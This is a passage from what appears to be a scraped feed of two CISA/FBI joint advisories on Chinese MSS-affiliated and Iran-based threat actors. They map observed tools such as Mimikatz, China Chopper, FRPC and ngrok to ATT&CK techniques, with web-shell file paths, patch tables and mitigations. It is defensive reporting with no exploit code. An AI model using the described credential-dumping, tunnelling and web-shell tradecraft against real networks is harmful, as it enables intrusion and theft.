for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/%20>)] \n \nThe following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. \n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)\n\n[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)\n\n[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n\n[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n\n[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n\n[[10] GitHub](<https://www.GitHub.com>)\n\n[[11] Exploit-DB](<https://www.exploit-db.com/>)\n\n[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)\n\n### Revisions\n\nSeptember 14, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-258A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-10T02:48:53", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys that was likely used as a password changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1245/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. \n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. \n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. \n \n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>)\n\n| Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. \n \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>)\n\n| Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as lateral movement tool. \n \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>)\n\n| Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1005](<https://attack.mitre.org/techniques/T1005/>)\n\n| Data from Local System | The threat actor searched local system sources to accessed sensitive documents. \n \n[T1039](<https://attack.mitre.org/techniques/T1039/>)\n\n| Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n \n[T1213](<https://attack.mitre.org/techniques/T1213/>)\n\n| Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n \n[T1530](<https://attack.mitre.org/techniques/T1530/>)\n\n| Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>)\n\n| Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. \n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>)\n\n| Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n \n[T1105](<https://attack.mitre.org/techniques/T1105/>)\n\n| Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n \n[T1572](<https://attack.mitre.org/techniques/T1572/>)\n\n| Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. \n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at 